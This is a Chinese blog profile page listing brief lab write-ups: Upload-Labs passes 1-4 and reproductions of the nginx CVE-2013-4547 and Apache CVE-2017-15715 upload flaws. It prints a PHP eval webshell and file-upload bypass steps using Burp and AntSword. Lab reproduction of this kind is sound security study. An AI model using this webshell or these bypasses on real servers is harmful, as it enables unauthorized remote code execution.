- 博客(4)
- 收藏
- 关注
原创 Upload-Labs靶场1-4
用的buu的靶场Pass-01查看源码发现进行了限制一句话木马:<?php @eval($_POST['key']);?>用bp将yjhmm.jpg修改为yjhmm.php然后放包过去上传地址:http://ca713556-ace3-46a0-be37-2972e851bfa3.node4.buuoj.cn:81/upload/yjhmm.php然后用蚁剑连接Pass-02查看源码对文件类型进行了限制这里和Pass-01一样.
2022-04-18 12:42:31
2079
原创 nginx漏洞复现
C V E - 2 0 1 3 - 4 5 4 7构建并启动容器1.2.访问网址IP地址3.上传图片文件bp抓包在<?php phpinfo();?>前面加上GIF89a??改成图片文件4.bp send放包过去/uploadfiles/a7c3ce076585477741d951d179ab07dc.jpg在网址后面加上这个文件返回的上传路径5.最后成功复现...
2022-03-21 17:37:18
6609
原创 apache中间件复现
CVE-2017-15715构建并且启动容器:1.docker-compose build docker-compose up -d 启动后Apache运行在http://your-ip:80802.bp hex中修改后面70 68 70后面加上0a3.将包send过去4.在php后面加上/1.php%0a最后执行成功...
2022-03-21 17:21:28
4001
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人